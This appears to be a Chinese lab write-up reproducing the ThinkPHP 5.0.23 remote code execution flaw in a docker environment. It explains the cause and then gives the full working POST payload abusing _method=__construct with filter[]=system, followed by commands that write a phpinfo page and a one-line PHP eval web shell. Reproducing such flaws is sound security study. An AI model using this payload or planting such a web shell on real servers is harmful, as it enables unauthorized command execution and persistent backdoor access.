Thinkphp5.0.23 rce(远程代码执行)的漏洞复现
漏洞形成原因
- 框架介绍:
ThinkPHP是一款运用极广的PHP开发框架。 - 漏洞引入:
其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
漏洞如何利用
- 1、访问靶机地址+端口号 进入首页
- 2、Burp抓包修改传参方式为Post,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd为系统执行命令可进行一系列操作。
漏洞复现过程
- Kali docker 容器中启动此漏洞环境
data:image/s3,"s3://crabby-images/d9a55/d9a55d4c29f4f87e6bc033d64454ceb0f07cbdd9" alt="在这里插入图片描述" - 浏览器访问 Kali 的 ip 地址接上8080端口
data:image/s3,"s3://crabby-images/9c527/9c527b3c4a664ad61db43964432b01f7899a3794" alt="在这里插入图片描述"
- Burp抓包修改传参方式为Post,url后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。
data:image/s3,"s3://crabby-images/b49e7/b49e72a0730ed0e0befce6e16542428325c63b5a" alt="在这里插入图片描述" data:image/s3,"s3://crabby-images/740e3/740e38abf619e1b248e36c8a7ab50e6f0c1fe59e" alt="在这里插入图片描述"
/index.php?s=captch
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd
-
Burp Go data:image/s3,"s3://crabby-images/88e93/88e93ad9170d90b78c99383108ca4455a3af033b" alt="在这里插入图片描述" data:image/s3,"s3://crabby-images/94056/94056591c583567d1c61a01d4273354fb8eda7b9" alt="在这里插入图片描述" -
尝试写入phpinfo
echo "<?php phpinfo(); ?>" > info.php
data:image/s3,"s3://crabby-images/a0a59/a0a5949de8f637403d4ca920193b8232b5509388" alt="在这里插入图片描述"
- 成功!
data:image/s3,"s3://crabby-images/3c2d4/3c2d447ec85cabc4c9539dbc3c4d07197d1d1335" alt="在这里插入图片描述" - 写入一句话
echo '<?php eval($_POST[aaa]); ?>' > shell.php
data:image/s3,"s3://crabby-images/c4dfa/c4dfa8777e77865995fb4e76f03f5da316a1e34d" alt="在这里插入图片描述"
|